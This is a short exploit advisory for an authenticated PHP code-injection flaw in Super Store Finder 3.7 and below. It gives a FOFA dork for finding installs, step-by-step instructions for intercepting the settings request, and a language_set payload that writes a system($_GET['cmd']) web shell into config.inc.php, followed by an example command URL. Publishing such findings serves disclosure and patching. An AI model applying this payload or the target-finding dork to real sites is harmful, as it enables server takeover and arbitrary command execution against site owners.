Authored by Etharus

Super Store Finder versions 3.7 and below suffer from a remote command execution vulnerability.

# Vulnerability : Authenticated Arbitrary PHP Code Injection lead to Remote
Code Execution
# Researcher : Etharus
# Vendor : Joe Iz, https://www.superstorefinder.net/
# Demo Url : https://superstorefinder.net/products/superstorefinder/
# Version Affected : 3.7 and below
# Date : 18 September 2023
# FOFA Dork : "designed and built by Joe Iz."
# Step 1 : Login as user/admin
# Step 2 : Go to Settings on right top
# Step 3 : Turn on proxy to intercept request and save the settings
# Step 4 : On language_set parameter set the value to
en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//
# Step 5 : Due to index.php called config.inc.php , we just can go for rce
with parameter ?cmd=
# Step 6 : Example. http://localhost/?cmd=uname%20-a